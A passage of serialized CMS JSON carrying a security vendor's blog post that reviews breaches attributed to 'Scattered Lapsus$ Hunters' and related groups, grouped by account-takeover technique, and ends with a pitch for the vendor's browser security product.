controls.","2026-04-04T00:00:00.000Z","device-code-phishing",{"items":1266},[1267,1271],{"sys":1268,"name":1270},{"id":1269},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":1272,"name":1274},{"id":1273},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":1276},[1277,2270,3143],{"__typename":1278,"sys":1279,"content":1281,"title":2252,"synopsis":2253,"hashTags":118,"publishedDate":2254,"slug":2255,"tagsCollection":2256,"authorsCollection":2262},"BlogPosts",{"id":1280},"2sFCww9xnI8okIxhtOaiY1",{"json":1282},{"nodeType":1259,"data":1283,"content":1284},{},[1285,1292,1299,1306,1310,1320,1327,1334,1343,1350,1356,1378,1385,1397,1400,1408,1415,1431,1438,1450,1456,1459,1467,1476,1482,1491,1511,1520,1527,1536,1555,1564,1571,1580,1613,1622,1629,1638,1656,1662,1671,1678,1687,1730,1733,1741,1750,1770,1779,1786,1795,1828,1834,1843,1850,1856,1859,1867,1876,1883,1945,1951,1954,1962,1971,1978,1984,1987,1995,2002,2009,2079,2086,2149,2156,2159,2167,2174,2181,2187,2190,2198,2205,2212,2219],{"nodeType":1258,"data":1286,"content":1287},{},[1288],{"nodeType":1257,"value":1289,"marks":1290,"data":1291},"The biggest cybersecurity story this year (so far) has been the emergence of “Scattered Lapsus$ Hunters” and their record-breaking worldwide hacking spree. ",[],{},{"nodeType":1258,"data":1293,"content":1294},{},[1295],{"nodeType":1257,"value":1296,"marks":1297,"data":1298},"Scattered Lapsus$ Hunters is part of “The Com”, the name for the broad community of English-speaking cybercriminals with international criminal connections — including with nation-state sponsored groups. They are also known to collaborate with a range of cybercrime “as-a-Service” organizations for phishing, initial access, ransomware, and more. ",[],{},{"nodeType":1258,"data":1300,"content":1301},{},[1302],{"nodeType":1257,"value":1303,"marks":1304,"data":1305},"It’s difficult to pin down exactly who the individuals are that make up this criminal collective. But what is known is their MO — making money through extortion by means of account takeover, mass data theft, and ransomware deployment. ",[],{},{"nodeType":1307,"data":1308,"content":1309},"hr",{},[],{"nodeType":1311,"data":1312,"content":1313},"heading-1",{},[1314],{"nodeType":1257,"value":1315,"marks":1316,"data":1319},"How did we get here? ",[1317],{"type":1318},"bold",{},{"nodeType":1258,"data":1321,"content":1322},{},[1323],{"nodeType":1257,"value":1324,"marks":1325,"data":1326},"Earlier this year, the threat group known to most analysts as Scattered Spider (also tracked as 0ktapus, Octo Tempest, Scatter Swine, Muddled Libra, and UNC3944) re-emerged after a series of arrests in late 2024. ",[],{},{"nodeType":1258,"data":1328,"content":1329},{},[1330],{"nodeType":1257,"value":1331,"marks":1332,"data":1333},"This group has been active in peaks and troughs over the years, but are mainly known for high-profile ransomware attacks on Caesars and MGM Resorts in 2024. ",[],{},{"nodeType":1335,"data":1336,"content":1342},"embedded-entry-block",{"target":1337},{"sys":1338},{"id":1339,"type":1340,"linkType":1341},"1Vt269d7n6IGMzOrJs1FDx","Link","Entry",[],{"nodeType":1258,"data":1344,"content":1345},{},[1346],{"nodeType":1257,"value":1347,"marks":1348,"data":1349},"Scattered Spider hit the headlines again in April 2025 with attacks on UK retailers Marks & Spencer and Co-op, which resulted in significant, prolonged disruption, and a serious downstream impact on the retail supply chain. ",[],{},{"nodeType":1335,"data":1351,"content":1355},{"target":1352},{"sys":1353},{"id":1354,"type":1340,"linkType":1341},"3kvcGV2zZZUPnM8IK04Y1O",[],{"nodeType":1258,"data":1357,"content":1358},{},[1359,1363,1374],{"nodeType":1257,"value":1360,"marks":1361,"data":1362},"It didn’t stop there, though. What followed was a wide-scale campaign targeting Salesforce customers, with the attackers claiming to have stolen ",[],{},{"nodeType":1364,"data":1365,"content":1367},"hyperlink",{"uri":1366},"https://www.bleepingcomputer.com/news/security/shinyhunters-claims-15-billion-salesforce-records-stolen-in-drift-hacks/",[1368],{"nodeType":1257,"value":1369,"marks":1370,"data":1373},"over 1.5 billion records from 1000+ companies",[1371],{"type":1372},"underline",{},{"nodeType":1257,"value":1375,"marks":1376,"data":1377}," across multiple verticals, including heavyweights like Google, Cloudflare, Workday, Adidas, FedEx, Disney, LVMH, and many more.",[],{},{"nodeType":1258,"data":1379,"content":1380},{},[1381],{"nodeType":1257,"value":1382,"marks":1383,"data":1384},"Around this time, the attackers began to refer to themselves as part of a wider collective, assuming the moniker “Scattered Lapsus$ Hunters” (a mash-up of names given by analysts and self-adopted by attackers — Scattered Spider, ShinyHunters, and Lapsus$).",[],{},{"nodeType":1258,"data":1386,"content":1387},{},[1388,1392],{"nodeType":1257,"value":1389,"marks":1390,"data":1391},"The most significant breach this year to-date impacted Jaguar Land Rover. A ransomware attack resulted in months of disruption that directly impacted the UK’s GDP, with the government underwriting a $1.5B loan to alleviate the supply chain impact. ",[],{},{"nodeType":1257,"value":1393,"marks":1394,"data":1396},"In fact, this was the most economically consequential cyber attack yet recorded in a G7 economy. ",[1395],{"type":1318},{},{"nodeType":1307,"data":1398,"content":1399},{},[],{"nodeType":1311,"data":1401,"content":1402},{},[1403],{"nodeType":1257,"value":1404,"marks":1405,"data":1407},"2025 wasn’t a one-off",[1406],{"type":1318},{},{"nodeType":1258,"data":1409,"content":1410},{},[1411],{"nodeType":1257,"value":1412,"marks":1413,"data":1414},"The developments through 2025 have presented a stronger picture than ever before that cybercriminal operations are heavily interlinked. Groups overlap considerably, and individuals freely move between different cells. ",[],{},{"nodeType":1258,"data":1416,"content":1417},{},[1418,1422,1427],{"nodeType":1257,"value":1419,"marks":1420,"data":1421},"When we scratch beneath the surface, this is evident in the tactics, techniques and procedures (TTPs) used by these attackers — even stretching as far back as 2021 with the initial rise of Lapsus$. This is not an accident. ",[],{},{"nodeType":1257,"value":1423,"marks":1424,"data":1426},"The TTPs used show a conscious move by attackers to move away from environments that are well-protected by traditional security tools. ",[1425],{"type":1318},{},{"nodeType":1257,"value":1428,"marks":1429,"data":1430},"This means avoiding targeting endpoints with malware, and not relying on software-based exploits. Instead, these attackers look to take over apps and services directly over the internet. ",[],{},{"nodeType":1258,"data":1432,"content":1433},{},[1434],{"nodeType":1257,"value":1435,"marks":1436,"data":1437},"Most of the time, this is as simple as logging in to a SaaS app, or an enterprise SSO account (e.g. Microsoft, Okta, or Google) and dumping the data. For attackers that want to take it further, they can abuse the sprawl of interconnected apps that make up modern business IT, seeking out specific data or exploitable functionality. Or, they can leverage internet-accessible management portals to chart a path back to your on-premise assets, giving them everything they need to pivot toward more conventional methods such as ransomware deployment. ",[],{},{"nodeType":1258,"data":1439,"content":1440},{},[1441,1445],{"nodeType":1257,"value":1442,"marks":1443,"data":1444},"When we look at historical breaches, the pattern is clear. ",[],{},{"nodeType":1257,"value":1446,"marks":1447,"data":1449},"Not one of the attacks attributed to Scattered Lapsus$ Hunters, or its predecessors, started with an endpoint or network attack — they all began with account takeover. ",[1448],{"type":1318},{},{"nodeType":1335,"data":1451,"content":1455},{"target":1452},{"sys":1453},{"id":1454,"type":1340,"linkType":1341},"6poP5VM2ARrEvwKEG42HgK",[],{"nodeType":1307,"data":1457,"content":1458},{},[],{"nodeType":1311,"data":1460,"content":1461},{},[1462],{"nodeType":1257,"value":1463,"marks":1464,"data":1466},"TTP breakdown: Analysing the top “Scattered Lapsus$ Hunters” breaches since 2021",[1465],{"type":1318},{},{"nodeType":1468,"data":1469,"content":1470},"heading-2",{},[1471],{"nodeType":1257,"value":1472,"marks":1473,"data":1475},"Phishing and stolen credentials",[1474],{"type":1318},{},{"nodeType":1335,"data":1477,"content":1481},{"target":1478},{"sys":1479},{"id":1480,"type":1340,"linkType":1341},"4SNOanDIdGZsvRRnMYQVSo",[],{"nodeType":1258,"data":1483,"content":1484},{},[1485],{"nodeType":1257,"value":1486,"marks":1487,"data":1490},"EA Games (2021)",[1488,1489],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1492,"content":1493},{},[1494,1498,1507],{"nodeType":1257,"value":1495,"marks":1496,"data":1497},"Attackers used stolen session cookies to log into EA’s Slack instance, purchased on a criminal forum. Combined with ",[],{},{"nodeType":1364,"data":1499,"content":1501},{"uri":1500},"https://pushsecurity.com/blog/phishing-slack-persistence/",[1502],{"nodeType":1257,"value":1503,"marks":1504,"data":1506},"social engineering via Slack",[1505],{"type":1372},{},{"nodeType":1257,"value":1508,"marks":1509,"data":1510},", this was used to steal 750GB of data, including video game source code. ",[],{},{"nodeType":1258,"data":1512,"content":1513},{},[1514],{"nodeType":1257,"value":1515,"marks":1516,"data":1519},"Nvidia (2022)",[1517,1518],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1521,"content":1522},{},[1523],{"nodeType":1257,"value":1524,"marks":1525,"data":1526},"Attackers used stolen credentials to steal 1TB of data from Nvidia’s internal shares, including a significant amount of sensitive information about the designs of Nvidia graphics cards, source code, and the usernames and passwords of more than 71,000 Nvidia employees.",[],{},{"nodeType":1258,"data":1528,"content":1529},{},[1530],{"nodeType":1257,"value":1531,"marks":1532,"data":1535},"Microsoft (2022)",[1533,1534],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1537,"content":1538},{},[1539,1543,1551],{"nodeType":1257,"value":1540,"marks":1541,"data":1542},"Attackers used stolen credentials combined with SIM swapping and ",[],{},{"nodeType":1364,"data":1544,"content":1546},{"uri":1545},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/mfa_fatigue/description.md",[1547],{"nodeType":1257,"value":1548,"marks":1549,"data":1550},"MFA fatigue",[],{},{"nodeType":1257,"value":1552,"marks":1553,"data":1554}," attacks to steal Azure DevOps source code — leaked a 9GB archive of Microsoft source code – including ~90% of Bing and 45% of Cortana code. ",[],{},{"nodeType":1258,"data":1556,"content":1557},{},[1558],{"nodeType":1257,"value":1559,"marks":1560,"data":1563},"T-Mobile (2022)",[1561,1562],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1565,"content":1566},{},[1567],{"nodeType":1257,"value":1568,"marks":1569,"data":1570},"Attackers used stolen credentials to establish initial access, coupled with social engineering T-Mobile staff into approving the attacker’s device for VPN access. This resulted in source code being stolen from over 30,000 repositories. ",[],{},{"nodeType":1258,"data":1572,"content":1573},{},[1574],{"nodeType":1257,"value":1575,"marks":1576,"data":1579},"Snowflake (165 customers) (2024)",[1577,1578],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1581,"content":1582},{},[1583,1587,1596,1600,1609],{"nodeType":1257,"value":1584,"marks":1585,"data":1586},"Attackers targeted ",[],{},{"nodeType":1364,"data":1588,"content":1590},{"uri":1589},"https://pushsecurity.com/blog/snowflake-retro/",[1591],{"nodeType":1257,"value":1592,"marks":1593,"data":1595},"165 Snowflake customers",[1594],{"type":1372},{},{"nodeType":1257,"value":1597,"marks":1598,"data":1599}," using stolen credentials from credential breaches dating back as far as 2020. Due to widespread MFA gaps and the presence of ",[],{},{"nodeType":1364,"data":1601,"content":1603},{"uri":1602},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/ghost_logins/description.md",[1604],{"nodeType":1257,"value":1605,"marks":1606,"data":1608},"ghost logins",[1607],{"type":1372},{},{"nodeType":1257,"value":1610,"marks":1611,"data":1612},", attackers were able to simply log in to individual customer tenants, dump the data, and use it to extort the companies. In total, 9 public victims were named following the breach, with over 1B breached customer records. ",[],{},{"nodeType":1258,"data":1614,"content":1615},{},[1616],{"nodeType":1257,"value":1617,"marks":1618,"data":1621},"PowerSchool (2024)",[1619,1620],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1623,"content":1624},{},[1625],{"nodeType":1257,"value":1626,"marks":1627,"data":1628},"Attackers gained access to a community-focused customer support portal, PowerSource, using compromised credentials and stole data using an \"export data manager\" customer support tool, stealing the data of 62.4 million students and 9.5 million teachers. PowerSchool paid an undisclosed ransom fee, but hackers returned later to extort schools and individuals separately anyway.",[],{},{"nodeType":1258,"data":1630,"content":1631},{},[1632],{"nodeType":1257,"value":1633,"marks":1634,"data":1637},"Red Hat (2025)",[1635,1636],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1639,"content":1640},{},[1641,1645,1652],{"nodeType":1257,"value":1642,"marks":1643,"data":1644},"Attackers breached Red Hat’s GitLab instance via a compromised account — the result of ",[],{},{"nodeType":1364,"data":1646,"content":1647},{"uri":1602},[1648],{"nodeType":1257,"value":1605,"marks":1649,"data":1651},[1650],{"type":1372},{},{"nodeType":1257,"value":1653,"marks":1654,"data":1655}," providing a backdoor to access an otherwise secure, SSO-connected account. Stolen data included approximately 800 Customer Engagement Reports (CERs), authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure. ",[],{},{"nodeType":1335,"data":1657,"content":1661},{"target":1658},{"sys":1659},{"id":1660,"type":1340,"linkType":1341},"G1V7d5Dvevmr9p0YXElPX",[],{"nodeType":1258,"data":1663,"content":1664},{},[1665],{"nodeType":1257,"value":1666,"marks":1667,"data":1670},"Discord (2025)",[1668,1669],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1672,"content":1673},{},[1674],{"nodeType":1257,"value":1675,"marks":1676,"data":1677},"Attackers compromised a Zendesk customer support account, stealing 1.6TB of data. The hackers say this consisted of roughly 8.4 million tickets affecting 5.5 million unique users, and that about 580,000 users contained payment information.",[],{},{"nodeType":1258,"data":1679,"content":1680},{},[1681],{"nodeType":1257,"value":1682,"marks":1683,"data":1686},"SoundCloud, MatchGroup, Crunchbase, Betterment... (2026)",[1684,1685],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1688,"content":1689},{},[1690,1694,1702,1706,1714,1718,1726],{"nodeType":1257,"value":1691,"marks":1692,"data":1693},"Scattered Lapsus$ Hunters have already claimed several public victims in 2026, with over 60 million breached records. ",[],{},{"nodeType":1364,"data":1695,"content":1697},{"uri":1696},"https://www.bleepingcomputer.com/news/security/shinyhunters-claim-to-be-behind-sso-account-data-theft-attacks/",[1698],{"nodeType":1257,"value":1699,"marks":1700,"data":1701},"SoundCloud, Betterment, Crunchbase",[],{},{"nodeType":1257,"value":1703,"marks":1704,"data":1705}," and ",[],{},{"nodeType":1364,"data":1707,"content":1709},{"uri":1708},"https://www.bleepingcomputer.com/news/security/match-group-breach-exposes-data-from-hinge-tinder-okcupid-and-match/",[1710],{"nodeType":1257,"value":1711,"marks":1712,"data":1713},"MatchGroup",[],{},{"nodeType":1257,"value":1715,"marks":1716,"data":1717}," have all reported breaches this month, powered by a brand ",[],{},{"nodeType":1364,"data":1719,"content":1721},{"uri":1720},"https://pushsecurity.com/blog/unpacking-the-latest-slh-campaign/",[1722],{"nodeType":1257,"value":1723,"marks":1724,"data":1725},"new real-time-operated AiTM phishing kit",[],{},{"nodeType":1257,"value":1727,"marks":1728,"data":1729}," targeting Okta, Entra, and Google SSO accounts. This is a developing situation, with more victims expected to be announced publicly soon.",[],{},{"nodeType":1307,"data":1731,"content":1732},{},[],{"nodeType":1468,"data":1734,"content":1735},{},[1736],{"nodeType":1257,"value":1737,"marks":1738,"data":1740},"Vishing and help desk scams",[1739],{"type":1318},{},{"nodeType":1258,"data":1742,"content":1743},{},[1744],{"nodeType":1257,"value":1745,"marks":1746,"data":1749},"MGM Resorts & Caesars (2023)",[1747,1748],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1751,"content":1752},{},[1753,1757,1766],{"nodeType":1257,"value":1754,"marks":1755,"data":1756},"MGM Resorts and Caesars were hit with twin breaches in 2023. Attackers socially engineered help desk personnel to take over accounts with Super Administrator privileges within MGM Resorts’ Okta tenant, which they then used to register a second, attacker-controlled IdP via ",[],{},{"nodeType":1364,"data":1758,"content":1760},{"uri":1759},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/inbound_federation/description.md",[1761],{"nodeType":1257,"value":1762,"marks":1763,"data":1765},"inbound federation",[1764],{"type":1372},{},{"nodeType":1257,"value":1767,"marks":1768,"data":1769}," — granting comprehensive access that was used to deploy ransomware. ",[],{},{"nodeType":1258,"data":1771,"content":1772},{},[1773],{"nodeType":1257,"value":1774,"marks":1775,"data":1778},"Transport for London (2024)",[1776,1777],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1780,"content":1781},{},[1782],{"nodeType":1257,"value":1783,"marks":1784,"data":1785},"Attackers socially engineered the Transport for London help desk to gain privileged access to the IT environment, resulting in prolonged disruption to key online services underpinning London’s public transport network, theft of 5,000 users bank details, and all 30,000 staff members having to reset their online credentials in person.",[],{},{"nodeType":1258,"data":1787,"content":1788},{},[1789],{"nodeType":1257,"value":1790,"marks":1791,"data":1794},"Marks & Spencer (2025)",[1792,1793],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1796,"content":1797},{},[1798,1802,1811,1815,1824],{"nodeType":1257,"value":1799,"marks":1800,"data":1801},"Attackers compromised a Microsoft Entra account belonging to a privileged user via a ",[],{},{"nodeType":1364,"data":1803,"content":1805},{"uri":1804},"https://pushsecurity.com/blog/scattered-spider-defending-against-help-desk-scams/",[1806],{"nodeType":1257,"value":1807,"marks":1808,"data":1810},"help desk scam",[1809],{"type":1372},{},{"nodeType":1257,"value":1812,"marks":1813,"data":1814},", which enabled them to steal sensitive data from cloud environments, as well as pivot to deploy ransomware via the ",[],{},{"nodeType":1364,"data":1816,"content":1818},{"uri":1817},"https://cloud.google.com/blog/topics/threat-intelligence/vsphere-active-directory-integration-risks",[1819],{"nodeType":1257,"value":1820,"marks":1821,"data":1823},"VMware admin console",[1822],{"type":1372},{},{"nodeType":1257,"value":1825,"marks":1826,"data":1827},". This enabled ransomware to be deployed at the hypervisor layer, evading host-based protections like EDR. ",[],{},{"nodeType":1335,"data":1829,"content":1833},{"target":1830},{"sys":1831},{"id":1832,"type":1340,"linkType":1341},"7hBdHG74NaA3bQfOMpYA9o",[],{"nodeType":1258,"data":1835,"content":1836},{},[1837],{"nodeType":1257,"value":1838,"marks":1839,"data":1842},"Jaguar Land Rover (2025)",[1840,1841],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1844,"content":1845},{},[1846],{"nodeType":1257,"value":1847,"marks":1848,"data":1849},"Attackers compromised highly privileged admin accounts via a help desk scam, which they leveraged to access and deploy ransomware to all aspects of Jaguar’s business, from CAD and engineering software, to payments tracking, to customer car delivery, using similar techniques to the Marks & Spencer breach. ",[],{},{"nodeType":1335,"data":1851,"content":1855},{"target":1852},{"sys":1853},{"id":1854,"type":1340,"linkType":1341},"6s1X2fo4K9EeVLBmHm4YXb",[],{"nodeType":1307,"data":1857,"content":1858},{},[],{"nodeType":1468,"data":1860,"content":1861},{},[1862],{"nodeType":1257,"value":1863,"marks":1864,"data":1866},"Malicious OAuth integrations",[1865],{"type":1318},{},{"nodeType":1258,"data":1868,"content":1869},{},[1870],{"nodeType":1257,"value":1871,"marks":1872,"data":1875},"Salesforce & Salesloft (1000+ customers) (2025)",[1873,1874],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1877,"content":1878},{},[1879],{"nodeType":1257,"value":1880,"marks":1881,"data":1882},"A vast campaign against Salesforce customers resulted in the compromise of 1000+ Salesforce tenants (according to the attacker) with more than 1.5 billion records stolen. This campaign can consisted of three phases:",[],{},{"nodeType":1884,"data":1885,"content":1886},"unordered-list",{},[1887,1903,1918],{"nodeType":1888,"data":1889,"content":1890},"list-item",{},[1891],{"nodeType":1258,"data":1892,"content":1893},{},[1894,1899],{"nodeType":1257,"value":1895,"marks":1896,"data":1898},"Phase 1:",[1897],{"type":1318},{},{"nodeType":1257,"value":1900,"marks":1901,"data":1902}," The attacker conducted a large-scale vishing campaign against Salesforce customers, calling up users and socially engineering them into connecting a malicious version of the “Data Loader” app into their tenant. This was in fact an attacker-controlled app that enabled data to be mass-exfiltrated via API. ",[],{},{"nodeType":1888,"data":1904,"content":1905},{},[1906],{"nodeType":1258,"data":1907,"content":1908},{},[1909,1914],{"nodeType":1257,"value":1910,"marks":1911,"data":1913},"Phase 2: ",[1912],{"type":1318},{},{"nodeType":1257,"value":1915,"marks":1916,"data":1917},"The attacker conducted a supply-chain compromise against customers of Salesloft. Users of Salesloft’s “Drift” integration were impacted by attackers stealing access tokens from Salesloft’s AWS environment. This integration allowed the attacker to steal data from customers that had deployed Drift to connected environments — namely, Salesforce, and Google Workspace. ",[],{},{"nodeType":1888,"data":1919,"content":1920},{},[1921],{"nodeType":1258,"data":1922,"content":1923},{},[1924,1929,1933,1941],{"nodeType":1257,"value":1925,"marks":1926,"data":1928},"Phase 3:",[1927],{"type":1318},{},{"nodeType":1257,"value":1930,"marks":1931,"data":1932}," The attacker then conducted a separate supply-chain compromise involving Gainsight (allegedly using OAuth tokens stolen in the Salesloft attack) which enabled them to ",[],{},{"nodeType":1364,"data":1934,"content":1936},{"uri":1935},"https://www.bleepingcomputer.com/news/security/salesforce-investigates-customer-data-theft-via-gainsight-breach/",[1937],{"nodeType":1257,"value":1938,"marks":1939,"data":1940},"breach a further 285 Salesforce instances",[],{},{"nodeType":1257,"value":1942,"marks":1943,"data":1944}," using stolen OAuth tokens from Gainsight's integrations. ",[],{},{"nodeType":1335,"data":1946,"content":1950},{"target":1947},{"sys":1948},{"id":1949,"type":1340,"linkType":1341},"3TwjpVKQ42SwQRhvGFbZdn",[],{"nodeType":1307,"data":1952,"content":1953},{},[],{"nodeType":1468,"data":1955,"content":1956},{},[1957],{"nodeType":1257,"value":1958,"marks":1959,"data":1961},"Malicious browser extensions",[1960],{"type":1318},{},{"nodeType":1258,"data":1963,"content":1964},{},[1965],{"nodeType":1257,"value":1966,"marks":1967,"data":1970},"CyberHaven (2024)",[1968,1969],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1972,"content":1973},{},[1974],{"nodeType":1257,"value":1975,"marks":1976,"data":1977},"Hackers phished a CyberHaven extension developer and uploaded a malicious version of the CyberHaven extension to the Chrome Web Store, leading to customer data breaches where installed in user browsers, impacting CyberHaven’s estimated ~400 business customers. This was part of a broader campaign that targeted 35 Chrome extensions, collectively impacting over 2.5 million users.",[],{},{"nodeType":1335,"data":1979,"content":1983},{"target":1980},{"sys":1981},{"id":1982,"type":1340,"linkType":1341},"4ErDI0xi0Vj2Zrk8Qsb2NB",[],{"nodeType":1307,"data":1985,"content":1986},{},[],{"nodeType":1311,"data":1988,"content":1989},{},[1990],{"nodeType":1257,"value":1991,"marks":1992,"data":1994},"The bigger picture",[1993],{"type":1318},{},{"nodeType":1258,"data":1996,"content":1997},{},[1998],{"nodeType":1257,"value":1999,"marks":2000,"data":2001},"Scattered Lapsus$ Hunters are dominating the headlines right now, but they aren’t the only attackers using these modern techniques and consciously evading established security controls. ",[],{},{"nodeType":1258,"data":2003,"content":2004},{},[2005],{"nodeType":1257,"value":2006,"marks":2007,"data":2008},"Threat reports agree that attackers are steering away from traditional exploit and malware-driven breaches towards identities:",[],{},{"nodeType":1884,"data":2010,"content":2011},{},[2012,2035,2057],{"nodeType":1888,"data":2013,"content":2014},{},[2015],{"nodeType":1258,"data":2016,"content":2017},{},[2018,2022,2031],{"nodeType":1257,"value":2019,"marks":2020,"data":2021},"Identity-based attacks surged 32% in the last year, while 97% of identity attacks are password-based, driven by credential leaks and infostealer malware. (",[],{},{"nodeType":1364,"data":2023,"content":2025},{"uri":2024},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1",[2026],{"nodeType":1257,"value":2027,"marks":2028,"data":2030},"Microsoft",[2029],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":2033,"data":2034},")",[],{},{"nodeType":1888,"data":2036,"content":2037},{},[2038],{"nodeType":1258,"data":2039,"content":2040},{},[2041,2045,2054],{"nodeType":1257,"value":2042,"marks":2043,"data":2044},"79% of detections were malware-free in the last year, up from 40% in 2019. (",[],{},{"nodeType":1364,"data":2046,"content":2048},{"uri":2047},"https://www.crowdstrike.com/en-gb/global-threat-report/",[2049],{"nodeType":1257,"value":2050,"marks":2051,"data":2053},"CrowdStrike",[2052],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":2055,"data":2056},[],{},{"nodeType":1888,"data":2058,"content":2059},{},[2060],{"nodeType":1258,"data":2061,"content":2062},{},[2063,2067,2076],{"nodeType":1257,"value":2064,"marks":2065,"data":2066},"Credential abuse and phishing combined accounted for 38% of breaches, making identity the primary breach vector observed. (",[],{},{"nodeType":1364,"data":2068,"content":2070},{"uri":2069},"https://www.verizon.com/business/resources/reports/dbir/",[2071],{"nodeType":1257,"value":2072,"marks":2073,"data":2075},"Verizon",[2074],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":2077,"data":2078},[],{},{"nodeType":1258,"data":2080,"content":2081},{},[2082],{"nodeType":1257,"value":2083,"marks":2084,"data":2085},"And other public breaches from this year alone demonstrate similar TTPs from outside of the Scattered Lapsus$ Hunters orbit:",[],{},{"nodeType":1884,"data":2087,"content":2088},{},[2089,2104,2119,2134],{"nodeType":1888,"data":2090,"content":2091},{},[2092],{"nodeType":1258,"data":2093,"content":2094},{},[2095,2100],{"nodeType":1257,"value":2096,"marks":2097,"data":2099},"Nikkei",[2098],{"type":1318},{},{"nodeType":1257,"value":2101,"marks":2102,"data":2103},": Japanese publishing giant Nikkei’s Slack messaging platform was compromised using stolen credentials, leaking the names, email addresses, and chat histories for 17,368 individuals registered on Slack.",[],{},{"nodeType":1888,"data":2105,"content":2106},{},[2107],{"nodeType":1258,"data":2108,"content":2109},{},[2110,2115],{"nodeType":1257,"value":2111,"marks":2112,"data":2114},"Evertec",[2113],{"type":1318},{},{"nodeType":1257,"value":2116,"marks":2117,"data":2118},": Hackers tried to steal $130 million from Evertec’s Brazilian subsidiary Sinqia S.A.after gaining unauthorized access to its environment on the central bank’s real-time payment system (Pix) using stolen credentials.",[],{},{"nodeType":1888,"data":2120,"content":2121},{},[2122],{"nodeType":1258,"data":2123,"content":2124},{},[2125,2130],{"nodeType":1257,"value":2126,"marks":2127,"data":2129},"Hy-Vee:",[2128],{"type":1318},{},{"nodeType":1257,"value":2131,"marks":2132,"data":2133}," Was hit with a data breach after hackers logged in with stolen credentials, exposing 53GB of sensitive data.",[],{},{"nodeType":1888,"data":2135,"content":2136},{},[2137],{"nodeType":1258,"data":2138,"content":2139},{},[2140,2145],{"nodeType":1257,"value":2141,"marks":2142,"data":2144},"Scania: ",[2143],{"type":1318},{},{"nodeType":1257,"value":2146,"marks":2147,"data":2148},"Automotive giant Scania confirmed it suffered a cybersecurity incident where threat actors used compromised credentials to breach its Financial Services systems and steal insurance claim documents.",[],{},{"nodeType":1258,"data":2150,"content":2151},{},[2152],{"nodeType":1257,"value":2153,"marks":2154,"data":2155},"Scattered Lapsus$ Hunters may be grabbing the headlines — but this a huge movement in a vast and flexible community of attackers. And criminals around the world are learning from their success. ",[],{},{"nodeType":1307,"data":2157,"content":2158},{},[],{"nodeType":1311,"data":2160,"content":2161},{},[2162],{"nodeType":1257,"value":2163,"marks":2164,"data":2166},"Lessons learned",[2165],{"type":1318},{},{"nodeType":1258,"data":2168,"content":2169},{},[2170],{"nodeType":1257,"value":2171,"marks":2172,"data":2173},"The common thread with all of these attacks is that they are evading established security controls by targeting applications directly, over the internet, via account takeover.",[],{},{"nodeType":1258,"data":2175,"content":2176},{},[2177],{"nodeType":1257,"value":2178,"marks":2179,"data":2180},"Clearly, the success of these attacks shows the limitations of multiple control layers. Endpoint and network layer controls have no visibility of this attack surface. Identity-focused controls are being undermined by ghost logins and shadow IT. And the limitations of cloud security controls in their ability to encompass all apps, and detect and stop malicious actions in real-time (that often blend in seamlessly with normal user activity). ",[],{},{"nodeType":1335,"data":2182,"content":2186},{"target":2183},{"sys":2184},{"id":2185,"type":1340,"linkType":1341},"4Dg3fZEGf7ShyQJ8jlNDME",[],{"nodeType":1307,"data":2188,"content":2189},{},[],{"nodeType":1311,"data":2191,"content":2192},{},[2193],{"nodeType":1257,"value":2194,"marks":2195,"data":2197},"How Push can help",[2196],{"type":1318},{},{"nodeType":1258,"data":2199,"content":2200},{},[2201],{"nodeType":1257,"value":2202,"marks":2203,"data":2204},"Stopping attacks that are designed to evade established controls is in our DNA — it’s the reason Push was founded. ",[],{},{"nodeType":1258,"data":2206,"content":2207},{},[2208],{"nodeType":1257,"value":2209,"marks":2210,"data":2211},"The browser is the gateway to to the apps and identities that attackers are now targeting, with many attacks taking place inside the user’s browser — whether that’s entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA. ",[],{},{"nodeType":1258,"data":2213,"content":2214},{},[2215],{"nodeType":1257,"value":2216,"marks":2217,"data":2218},"Push’s browser-based security platform provides comprehensive detection and response capabilities against attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":1258,"data":2220,"content":2221},{},[2222,2226,2235,2239,2248],{"nodeType":1257,"value":2223,"marks":2224,"data":2225},"To learn more about Push, ",[],{},{"nodeType":1364,"data":2227,"content":2229},{"uri":2228},"https://pushsecurity.com/resources/product-brochure",[2230],{"nodeType":1257,"value":2231,"marks":2232,"data":2234},"check out our latest product overview",[2233],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":2237,"data":2238}," or ",[],{},{"nodeType":1364,"data":2240,"content":2242},{"uri":2241},"https://pushsecurity.com/demo",[2243],{"nodeType":1257,"value":2244,"marks":2245,"data":2247},"book some time with one of our team for a live demo",[2246],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":2250,"data":2251},".",[],{},"\"Scattered Lapsus$ Hunters\" — how modern attackers exploit the gaps in your security stack ","How Scattered Lapsus$ Hunters breaches demonstrate the evolution of attacker TTPs, shaping the future of cyber 